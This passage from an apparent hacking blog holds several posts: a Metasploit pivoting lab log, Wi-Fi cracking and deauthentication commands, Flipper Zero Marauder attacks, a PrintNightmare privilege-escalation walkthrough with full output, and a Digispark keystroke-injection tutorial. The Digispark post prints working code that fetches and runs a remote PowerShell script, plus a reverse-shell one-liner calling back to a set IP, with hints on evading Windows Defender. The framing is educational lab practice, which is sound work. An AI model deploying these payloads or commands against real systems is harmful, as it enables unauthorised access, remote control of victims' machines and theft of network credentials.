[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.102:4433 
[*] Sending stage (989032 bytes) to 192.168.56.106
[*] Command stager progress: 100.00% (773/773 bytes)

Creating The Pivot

To create the pivot, I jumped into the newly created Meterpreter session and ran the ifconfig command to see what available networks there were.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...meterpreter > ifconfigInterface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::Interface  2
============
Name         : eth0
Hardware MAC : 08:00:27:82:70:32
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.106
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe82:7032
IPv6 Netmask : ffff:ffff:ffff:ffff::Interface  3
============
Name         : eth1
Hardware MAC : 08:00:27:41:4f:ce
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.242.3
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe41:4fce
IPv6 Netmask : ffff:ffff:ffff:ffff::

Next, I sent the session to the background, selected the autoroute module, and configured it to use session 4.

msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       
   NETMASK  255.255.255.0    no       
   SESSION  4                yes       
   SUBNET                    no

I then ran the module and it create the pivot for me.

Finding Hosts Through Pivoting

I then needed to find the target host. Of course, I could have run ifconfig on it but where is the fun in that. I switched to the ping_sweep module and configured it to use session 4. I then configured the IP address of the remote network and ran the module.

msf6 post(multi/gather/ping_sweep) > options
Module options (post/multi/gather/ping_sweep):
   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   RHOSTS   192.168.242.0/24  yes       
   SESSION  4                 yes       
msf6 post(multi/gather/ping_sweep) > run
[*] Performing ping sweep for IP range 192.168.242.0/24
[+]     192.168.242.3 host found
[+]     192.168.242.2 host found
[+]     192.168.242.4 host found

Scanning Ports Through Pivoting

Sure enough, our host was there. Don’t ask me what the other ones are, I honestly don’t know and at this point, I’m too afraid to ask. Our target IP address was 192.168.242.4. So what’s next? service discovery obviously. I selected the portscan/tcp module and configured it to target the host. I ran the module and sure enough it found all the open ports on the host.

msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       
   DELAY        0                yes       
   JITTER       0                yes       
   PORTS        1-10000          yes       
   RHOSTS       192.168.242.4    yes       
   THREADS      1                yes       
   TIMEOUT      1000             yes       msf6 auxiliary(scanner/portscan/tcp) > run[+] 192.168.242.4:        - 192.168.242.4:25 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:23 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:21 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:22 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:53 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:80 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:111 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:139 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:445 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:512 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:513 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:514 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:1099 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:1524 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:2049 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:2121 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:3306 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:3632 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:5432 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:5900 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6000 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6667 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6697 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8009 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8180 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8787 - TCP OPEN
[*] 192.168.242.4:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Just to be on the safe side I tried to ping the host from my Kali VM to ensure I hadn’t messed something up. Sure enough, the network was unreachable.

┌──(kali㉿kali)-[~]
└─$ ping 192.168.242.4
ping: connect: Network is unreachable

Conclusion

So that’s what I’ve been doing today. I had this idea late last night when trying to get to sleep. It actually kept me awake for a while until I got up and wrote it down. This happens to me a lot but I do occasionally have some good ideas. Anyway, I really enjoyed this as I haven’t had much opportunity to experiment with pivoting. I’m actually shocked that I didn’t think of doing this sooner as it’s such an obvious method of practicing it. It was fun setting up, other than having a few errors with Metasploit due to some scripts being broken. Anyway, that’s me done for the day. I will record a video on this soon and upload it to the tube but until then.

How To Hack Wi-Fi Networks

Posted on January 11, 2025January 11, 2025 by haxez

Hello world, welcome to haxez where today we are going to larn how to hack Wi-Fi Networks. Wi-Fi networks are everywhere! Whether you’re in an industrial or residential area, there will likely be a Wi-Fi access point nearby. They allow us to have instant access to any information we need. They allow us to communicate with people on the other side of the world. We’re living in interesting times where information travels at the speed of light. Hello world, welcome to haxez where today I will be explaining how to hack Wi-Fi networks. If you’re looking for more information on the subject then head over to this article on Bordergate. Also, please go and watch the video at the bottom of the page.

Wi-Fi Hacking Hardware

While it might be possible to perform some Wi-Fi attacks using your built-in Wi-Fi chipset, you will have better success with the proper kit. There are dozens of manufacturers that make claims that their product offers the required functionality. However, after purchasing a bunch of cheap products and some expensive ones, I can honestly say that the Alfa makes the best devices for the job. In order to hack wireless networks, you need to be able to put the card in monitor mode and be able to perform packet injection. Some Alfa cards may be better than others but I’ve had a lot of luck with the AWUS036ACH.

Wi-Fi Brute-Force Attacks

One attack that doesn’t get mentioned much when discussing Wi-Fi hacking is brute force attacks. Brute force attacks are one of the most common methods that threat actors use to gain access to a system. If the system is secured using a weak password then a brute force attack should get you access to that system pretty quickly. Obviously, this discounts brute force protection mechanisms. However, you would be surprised at how many products don’t offer brute force protection by default. With a few lines of Python, it is possible to brute force the access point’s password. See this GitHub repository for an example.

Wi-Fi Deauthentication Attack

A Wi-Fi deauthentication attack is an attack that abuses the built-in functionality of the access point. The threat actor would impersonate the access point and send spoofed packets to a client. These packets deauthenticate the client. As a result, the client is disconnected from the access point. In order for the client to reconnect to the access point, it needs to send the secret to re-authenticate. The threat actor can then intercept the packet containing the secret and crack it to reveal the access point’s password.

First, you need to put your Wi-Fi adapter into monitor mode and start capturing data. This can be done using airodump-ng.

sudo airodump-ng wlan0

Then, you should start receiving information about the access points nearby.

Once you know which Wi-Fi network you want to attack, make a note of the BSSID and the channel number. Next, you need to start capturing packets from that AP and writing them to your local storage. This can be done using the airodump-ng tool again.

sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write handshake wlan0

Next, you need to identify a client to perform the attack. As you can see from the image above, one client has connected and we can see its station ID. Take note of the station ID as it will be needed for the next part of the attack. Using the tool aireplay-ng we can start creating the de-authentication packets and sending them to the client.

sudo aireplay-ng --deauth 4 -a <BSSID> -c <CLIENT STATION ID> wlan0

Finally, it’s time to crack the password from the packet we just captured. In order to do this we need to use the tool aircrack-ng. First, we specify the wordlist, then the AP BSSID, and finally the packet capture file.

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> handshake.cap

WPS Pixie-Dust Attack

WPS or Wi-Fi protected setup is a feature of wireless access points that allows for easy pairing of wireless devices. It was created and released by Cisco in 2006 and has since seen several vulnerabilities. One of these vulnerabilities is known as a Pixie Dust attack which brute forces the WPS feature of wireless access points. In order to carry out this attack we first need to set our Wi-Fi adapter to monitor mode.

sudo airmon-ng start wlan0

Next, we need to use the tool wash to identify Wi-Fi access points in the area that have WPS enabled.

sudo wash -i wlan0

Take the BSSID and the channel number from the output. Finally, we need to run the tool reaver to start the attack. As you can see from the command below, we’re specifying the BSSID, and the channel number, adding verbosity, specifying an output file, and setting the pixie dust argument to 1. After a few moments, you will receive a bunch of output including the WPS pin and WPA PSK.

sudo reaver --interface wlan0 --bssid <BSSID> --channel <CHANNEL> -vv -N -O output.pcap --pixie-dust 1

Evil Twin Attack

An evil twin attack is an attack where the threat actor essentially clones a legitimate access point and coerces the victim to connect to it. Once the victim is connected, the threat actor can then carry out several attacks such as forcing the victim to submit their credentials to a captive portal. This type of attack can be performed using the tool wifiphisher. Once run, you will see a number of access points. Select the one you want to attack.

sudo wifiphisher

The attack we’re going to be demonstrating is the captive portal attack which will ask the user for their password. Select the attack you want and the tool should start attacking the access point to deauth clients and prevent them from reconnecting.

The clients should then automatically connect to the threat actor’s access point and load the captive portal. The portal will access them for their password. The captive portal page can be customized to mimic social networking sites or even a page mimicking the ISP that provided the access point.

Anything submitted to the captive portal is sent to the threat actor in clear text. If the user submits their Wi-Fi password then the threat actor could now connect to the victim’s Wi-Fi and access their internal network. If they submitted their social media details then the threat actor would have that password which could be used for other online services.

Wi-Fi Hacking With Wifite

We have covered a lot of attacks, some of which have a complicated setup and use multiple tools. However, there is one tool that does almost all of them. That tool is called wifite and it’s a wrapper for the other tools we have used. It’s simple to use, all you need to do is run the wifite command. Within a few seconds, you should start seeing wifi networks pop up.

sudo wifite

When you see the network you want to attack, press control c to stop scanning. Then, input the number of the network you want to attack. Wifite will then go through each attack until it finds an attack that works. If you know that a certain type of attack isn’t going to work, it can be skipped with control c. Finally, if the attack is successful, it should automatically crack the password and display the results.

Wi-Fi Hacking Conclusions

While technology is catching up to these types of attacks, your home access point may not have those features. Also, it may not be configured to protect against these attacks out of the box. You want to make sure you’re using long complex passwords not found in wordlists. This will help ensure that even if the threat actor captures the secret, they can’t crack it. Furthermore, you should disable technologies like WPS. If you need it to connect a printer, do so but then disable it after. Anyway, the real reason for this post is to try and get more eyes on the demonstration video below. Please go check it out.

Hacking Wi-Fi Networks With The Flipper Zero and Marauder

Posted on January 11, 2025January 11, 2025 by haxez

Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero with Marauder to attack Wi-Fi networks. By default, the Flipper Zero doesn’t have Wi-Fi capabilities. However, with the addition of the Wi-Fi developer board, you can add this functionality. The Wi-Fi developer board is rocking an ESP32-S2 module. With this module, you can perform Wi-Fi penetration testing such as probing attacks, de-authentication attacks, SSID rickrolling, and more.

Installing Marauder to the Flipper Zero Wi-Fi Development Board

The Wi-Fi developer board can be purchased from the Flipper Zero website for $29.00. Obviously, As I’m in the UK I purchased mine from Joom for £36.60 excluding VAT and shipping (Ouch). As mentioned previously, the board adds Wi-Fi functionality to the Flipper Zero but you need to do a bit of work beforehand.

First, you need to download the Marauder firmware and flash it to the developer board. I would recommend using the UberGuidoZ Flipper repository to make the process easier. Unzip the zip archive and locate the flash.bat file. Then, while holding down the boot button, connect the Wi-Fi development board to your computer via USB and hold the boot button down for 3 seconds.

Installing Marauder to the Wi-Fi Flipper Zero Development Board — Installing Marauder to the Wi-Fi Development Board

Your computer should recognize the device. Now, double-click the batch file. You may get a Windows security alert, if that is the case click show more and then run anyway. This should spawn a command prompt window similar to the one below. Furthermore, it should have a number of options including the ability to flash the Marauder firmware. Select option 1 and wait patiently for it to install.

Flipper Zero Marauder install — Marauder install

Adding Marauder Wi-Fi Functionality To The Flipper Zero

Unfortunately, Flipper Zero doesn’t have the functionality to use the Marauder Firmware out of the box. However, you can install some custom firmware that contains the Marauder tools in order to use it. Although, That is going to be outside the scope of this post but feel free to click the image below to read my article on installing the RogueMaster firmware. Once you’ve read that, come back here and finish the article.

Marauder Flipper Zero Menu

Now that you have Maurader and RogueMaster installed, you should have access to the Marauder menu on your Flipper Zero. In order to access it, head to Applications > GPIO > [ESP32 WiFi Marauder]. After selecting Marauder you should have a number of options including View Log from, Scap AP, SSID, List, Select, Clear List, Attack, Beacon Spam, Sniff, Sniff PMKID on channel, Channel, Settings, Update, Reboot, and Help. Some of these options have sub-options that can be accessed by pressing left or right on your Flipper.

Flipper Zero Marauder Menu — Marauder Menu

Scanning Access Points

One of the first options in Marauder is Scan AP. This option lets you scan for access points within your nearby area. Furthermore, the results of these scans can be used with other attacks such as de-authentication and probe attacks. The image below shows that I have started a scan for local access points. The results will be displayed below and saved to the AP list.

Listing Access Points

The next option in the list is to list the access points that you have just scanned. This is a convenient feature as it assigns a number to each of the access points. This number can be used later to select the access point you want to attack. The image below shows the results of running the list command after running the Scan AP command. As you can see, it shows 5 access points (0 to 5). However, the list can be scrolled on indefinitely depending on the number of access points.

Selecting An Access Point

The select option allows you to select an access point based on the list. At least, that’s what I hope it is doing. Regardless, the option presents a keyboard that allows you to type in the access point you want to select. Once selected, you can then launch attacks against the selected access point.

Rick Roll Attack

The first attack that I’m going to talk about is the Rick Roll attack. That’s right, you can rickroll people but not in the conventional sense of sending them the Youtube URL. This attack is mostly harmless but is a cool party trick. By selecting the Rick Roll attack method, you send data out from the Flipper Wi-Fi board and create a bunch of dummy access points named in accordance with the lyrics from the song. As you can see from the image below, I have launched the attack and there are a number of new access points available.

Flipper Zero Marauder Wi-Fi De-Authentication Attack

The next attack I want to talk about is the Wi-Fi de-authentication attack. This attack can be useful when trying to capture handshakes. Wireless handshakes will contain the hashed password for the access point. Capturing the hash would allow you to crack it and then access the access point. The de-authentication attack works by sending de-authentication frames to the wireless access point. This packet is usually spoofed from the client and forces them to disconnect.

Probe Attack

Probes are sent out by devices when not connected to a wireless access point. They send probes for access points that they have previously connected to in order to see if the access point responds. A probe attack is essentially spamming probe requests to the select access point. I believe the desired output of this attack is to confuse the access point and potentially consume resources leading to a denial of service conditions. Don’t quote me on that though as I’m not 100% sure and am just going off of the articles I’ve read so far. I will update this if I get any more insight into the purpose of this attack.

Sniffing

The Wi-Fi developer board with Marauder also has a number of sniffing options including sniffing de-authentication packets, pwnagatchi packets, beacon packets, esp packets, and pmkid packets. I haven’t played with the sniffing options too much but it doesn’t seem like you can run both attack payloads and sniffing payloads at the same time. I will look into these options further at a later date.

Flipper Zero Marauder Conclusions

There is a lot more to the Marauder firmware than I’ve covered in this post. it has the ability to sniff packets and other things that I haven’t explored yet. However, I wanted to make a post about it as there aren’t many posts about it. Hopefully, this should get you up and running with the Marauder firmware and more people will make content about it. Anyway, the firmware and Wi-Fi development board are excellent additions to the Flipper Zero if you’re looking to increase its functionality. I can’t wait to see what other things people make.

Print Nightmare Privilege Escalation

Posted on January 11, 2025January 11, 2025 by haxez

Hello world, welcome to Haxez. In this post, I’m going to be demonstrating how to perform the Print Nightmare privilege escalation exploit. I will be using Evil-WinRM and the CVE-2021–1675.ps1 script by Caleb Stewart on GitHub. I’ve just completed the retired easy Hack The Box machine Driver and was blown away by this vulnerability. It’s easy to see why it is such a serious vulnerability.

What Is Print Nightmare?

The vulnerability exists because the Spooler service does not properly validate the driver when it is installed on a system. This can allow an attacker to install a malicious driver. Once installed, an attacker can exploit the vulnerability in the Print Spooler service to execute arbitrary code with system-level privileges.

This vulnerability can be exploited even if the user account used to install the driver has limited privileges. This is because the Print Spooler service runs with system-level privileges. This means that it has the ability to install and execute drivers with elevated privileges.

To mitigate the risk of exploitation, it is important to apply the appropriate patches and updates provided by Microsoft. Additionally, implementing other measures such as restricting access to the Spooler service and disabling it on systems.

The Scenario

A threat actor has obtained network access and a domain user’s credentials whether through phishing or some other social engineering attack. They can check the spooler service on the target host via the ‘impacket-rpcdump’ tool. If the following protocol is included in the output then it could be a good candidate for the exploit.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ impacket-rpcdump @10.129.95.238               
--snip--
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]
--snip--

The PrintNightmare Payload

In order to leverage this vulnerability to elevate privileges, we first need a payload to exploit it. Such an exploit is publically available on GitHub right now at the following URL https://github.com/calebstewart/CVE-2021-1675. We can use wget on our attack box to download this payload and store it in our scripts directory.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
--2023-03-17 18:04:25--  https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8000::154, 2606:50c0:8001::154, 2606:50c0:8002::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8000::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8001::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8002::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 178561 (174K) [text/plain]
Saving to: ‘CVE-2021-1675.ps1.1’
CVE-2021-1675.ps1.1                     100%[============================================================================>] 174.38K  --.-KB/s    in 0.03s   
2023-03-17 18:04:26 (4.96 MB/s) - 'CVE-2021-1675.ps1.1' saved [178561/178561]

The Foothold

We will need user credentials in order to perform this exploit. These could be obtained through many nefarious methods but I will leave that to your imagination. Once we have the credentials, we can connect to the box via the Evil-WinRM tool. As you can see from the output below, I’m connecting to the target host with the user tony. Furthermore, the password for tony’s account is ‘liltony’. I’ve specified the target IP address with the ‘-i’ flag and I’ve also specified my script directory with the ‘-s’ flag.

┌──(kali㉿kali)-[~/Driver]
└─$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> menu

,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/
       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

The Print Nightmare Exploit

We can now load the script that we saved to our script directory earlier by typing the script name (CVE-2021–1675.ps1). This will then load additional options into Evil-WinRM including the ability to ‘Invoke-Nightmare’. Typing ‘Invoke-Nightmare’ will then generate a new payload that will create a new user and add the user as a local administrator.

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> menu
,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/
       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-Win32Type 
[+] Dll-Loader 
[+] Donut-Loader 
[+] field 
[+] func 
[+] get_nightmare_dll 
[+] Invoke-Binary 
[+] Invoke-Nightmare 
[+] New-InMemoryModule 
[+] psenum 
[+] struct
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

The Print Nightmare Consequence

We are now able to remote the target system with the new user. As you can see from the output below, the new user is a member of the local administrator’s group. From here we could install persistence or perform an LSA dump to dump credentials from memory. If a Domain Administrator has logged in to this system then it would be game over for the domain controller.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.95.238 -u 'adm1n' -p 'P@ssw0rd' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> net localgroup
net.exe : System error 1312 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1312 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
A specified logon session does not exist. It may already have been terminated.

*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ 
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\adm1n\Documents>

Conclusion

I know that this is an old vulnerability but I recently stumbled on a box that let me pull it off. I thought it was fascinating and was blown away by how simple it was. Granted, that’s down to the developers of the exploit and the developers of Evil-WinRM. However, if I can pull off an exploit like this then anybody can. All it takes is a few misconfigured permissions and the whole domain is at risk. Anyway, I wanted to write a post about it because I thought it was a cool exploit.

The Digispark The DIY USB Rubber Ducky

Posted on January 11, 2025January 11, 2025 by haxez

Hello World and welcome to haxez. In this post, I will be discussing the Digispark. With the right payload, the Digispark can hack any computer in 2 seconds. I realize that’s a bold claim to make and is definitely a clickbait title but it isn’t far from the truth. The Digispark, like the Hak5 USB Rubber Ducky, is a keyboard emulator that can inject keystrokes on the target computer at breakneck speeds. Therefore, anything a hacker can do on a keyboard, the Digispark can do too but arguably faster. So, If you’re having trouble getting hold of a Hak5 USB Rubber Ducky then this could be the device for you. For about £2 and a bit of time, you can build your own Rubber Ducky from a Digispark. I’ve written another article using a different board, feel free to check that one out here.

Arduino Integrated Development Environment

The first step in creating your very own DIY USB Rubber Ducky super hacking tool is to download the Arduino Integrated Development Environment. This can be downloaded from the following URL https://www.arduino.cc/en/software. Simply visit the URL, click the download link, double-click the downloaded file and then follow the installation wizard.

Configuring Arduino IDE

Once you have installed the Arduino IDE, you need to configure it so that it can write your payloads to the Digispark. In order to do this, first launch the Arduino IDE then head to File, then Preferences, then paste the following URL into the Additional Boards Manager URLs input box. This allows the Arduino IDE to work with third-party boards such as the Digispark.

http://digistump.com/package_digistump_index.json

Digispark Additional Boards Manager URLS

Install Digispark AVR Boards

Next, you need to install the Digistump Digispark boards so that the Arduino IDE knows how to talk to your board. To do this, head to Tools, Board and click Boards Manager. Then from the drop-down menu select contributed and search for the Digistump AVR Boards. There should be an install button, click that and wait for the boards to finish installing.

Digispark Drivers

That should be everything you need. However, if Windows is having trouble recognizing your board then you may need to install the drivers manually. You can find these by performing a quick Google search for “Digispark Arduino Drivers”. This should take you to the following GitHub page which has a download link labeled Digistump.Drivers.zip. Download, extract and install these drivers.

https://github.com/digistump/DigistumpArduino/releases

Digispark USB Rubber Ducky Payloads

Now that you’re Arduino IDE is set up and the drivers are installed, it’s time to find some payloads. There are tons of payloads available on the internet that do various things. These payloads range from performing a fake Windows update while playing Never Gonna Give You Up by Rick Astley to launching a Fork Bomb on the target system. I hope it goes without saying that some of these payloads can be dangerous and you should exercise caution when playing with them. The following GitHub repository has some good payloads to practice with.

https://github.com/CedArctic/DigiSpark-Scripts

USB Rubber Ducky Digispark Payloads — Digispark Payloads

Reverse Shell Downloader Payload

The payload I’m going to be focusing on is the Powershell reverse shell payload. You can see from the script below that this is a fairly simple script. It starts by sending the Windows Key and R to the computer. This opens the Run dialog box. After a brief delay, it types out “powershell.exe” into the Run dialog box and then sends the Enter key. This spawns a new Powershell window. In the new Powershell Window, it types out a command to download another payload from a URL. After a brief delay, it then executes the payload.

// This script downloads and executes a powershell script efectively opening up a reverse shell in less than 3 seconds. 
// Credits to hak5 and samratashok (developer of the nishang framework).#include "DigiKeyboard.h"
void setup() {
}void loop() {
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("Invoke-WebRequest -Uri 'https://haxez.org/payload.ps1' -OutFile 'payload.ps1'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("./payload.ps1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for (;;) {
    /*Stops the digispark from running the scipt again*/
  }
}

USB Rubber Ducky Powershell Reverse Shell Payload

Please note that the following Powershell script will probably be caught by Windows Defender. However, with some tinkering like renaming variables and obfuscating the code, it may not be detected. I won’t be attempting to do that in this walkthrough. The following script is a reverse shell that will attempt to connect back to the IP address and port that you specify. This script will need to be uploaded to a server that you control and then the location of the script needs to be added to the downloader payload above.

#A simple and small reverse shell by samratashok's Nishang framework. Change the Host IP Address and Port according to your setup as described in the README file of the script. 
$sm=(New-Object Net.Sockets.TCPClient("192.168.0.23",4243)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the downloader payload to the Digispark. It’s important that you don’t plug in the Digispark first. First, paste your code into the Arduino IDE and then click the upload button. This will then spawn a terminal at the bottom of the application prompting you to plugin the device. You should now be able to plug in your Digispark. Once the terminal reads 100%, the payload will automatically execute. Probably best if you don’t try to use any payload that can potentially damage your computer.

USB Rubber Ducky Upload Payload To Digispark — Upload Payload To Digispark

Digispark USB Rubber Ducky Demonstration

With the payload written to the Digispark, it’s time to test it out. Ensure that you have uploaded the reverse shell payload to your web server and that the path has been amended in your download payload. Then set up a net cat listener or some other listener on your attack machine (the machine you want to connect back to) and plug the Digispark into the target machine. As mentioned previously, this will only likely work with Defender disabled unless you have modified your payload. However, please see the video below of a demonstration.

Kali Linux Virtual Machine Shared Folder

Posted on January 11, 2025 by haxez

Hello world, welcome to haxez where today I want to talk about creating a Kali Linux shared folder for your Virtual Machine. They are a useful feature that allows you to share files between your base operating system and your Virtual Machine. While Virtual Machines do have a bidirectional clipboard that allows you to copy to and from each machine. A shared folder allows for easy access to resources such as wordlists and other large files. Furthermore, they can be particularly useful if you have limited disk space on your Virtual Machine.

Creating A Kali Shared Folder

In VirtualBox, this is a fairly simple process. First, you need to select the Virtual Machine that you want to add the shared folder to and click settings.

Once the settings menu opens you need to navigate to the Shared Folders section in the left-hand column.

Next, click the blue folder icon with the green plus sign and that will pop up a window with a number of options.

Folder Options

